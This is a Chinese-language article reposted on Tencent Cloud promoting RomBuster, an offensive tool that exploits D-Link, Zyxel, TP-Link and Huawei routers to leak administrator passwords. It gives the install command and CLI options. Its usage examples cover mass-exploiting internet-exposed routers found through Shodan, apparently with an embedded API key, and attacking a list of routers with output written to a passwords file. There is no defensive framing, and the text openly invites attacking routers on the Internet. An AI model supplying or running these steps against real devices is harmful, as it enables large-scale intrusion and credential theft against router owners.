前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >RomBuster - 路由器攻击

RomBuster - 路由器攻击

作者头像
Khan安全团队
发布2021-07-08 11:42:00
发布2021-07-08 11:42:00
1.2K00
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

特征

  • 漏洞利用漏洞在最流行的路由器,比如D-LinkZyxelTP-LinkHuawei
  • 优化为从启用线程的列表中一次利用多个路由器。
  • 简单的 CLI 和 API 使用。

安装

代码语言:javascript
代码运行次数:0
复制
pip3 install git+https://github.com/EntySec/RomBuster

基本用法

要使用 RomBuster,只需rombuster在您的终端中输入即可。

允许泄露网络路由器管理员密码的开发工具。

可选参数:

代码语言:javascript
代码运行次数:0
复制
-h, --help 显示此帮助消息并退出 
-t, --threads 使用线程以加快工作速度。
-o OUTPUT, --output OUTPUT 输出结果到文件。
-i INPUT, --input INPUT 地址的输入文件。
-a ADDRESS, --address ADDRESS 单个地址。
--shodan SHODAN Shodan API密钥,用于通过 Internet开发设备。
--zoomeye ZOOMEYE ZoomEye API 密钥,用于通过 Internet 开发设备。
-p PAGES, --pages PAGES 要从 ZoomEye 获取的页面数。

例子

代码语言:javascript
代码运行次数:0
复制
rombuster -a 192.168.99.1

从 Internet 上利用

让我们尝试使用 Shodan 搜索引擎来利用 Internet 上的路由器,我们将使用它-t来快速利用。

代码语言:javascript
代码运行次数:0
复制
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvg

从输入文件中攻击

让我们尝试使用打开的路由器数据库-t进行快速利用。

代码语言:javascript
代码运行次数:0
复制
rombuster -t -i routers.txt -o passwords.txt

接口使用

RomBuster 也有自己的 Python API,可以通过将 RomBuster 导入您的代码来调用。

代码语言:javascript
代码运行次数:0
复制
from rombuster import RomBuster

项目地址:

https://github.com/EntySec/RomBuster

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-06-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档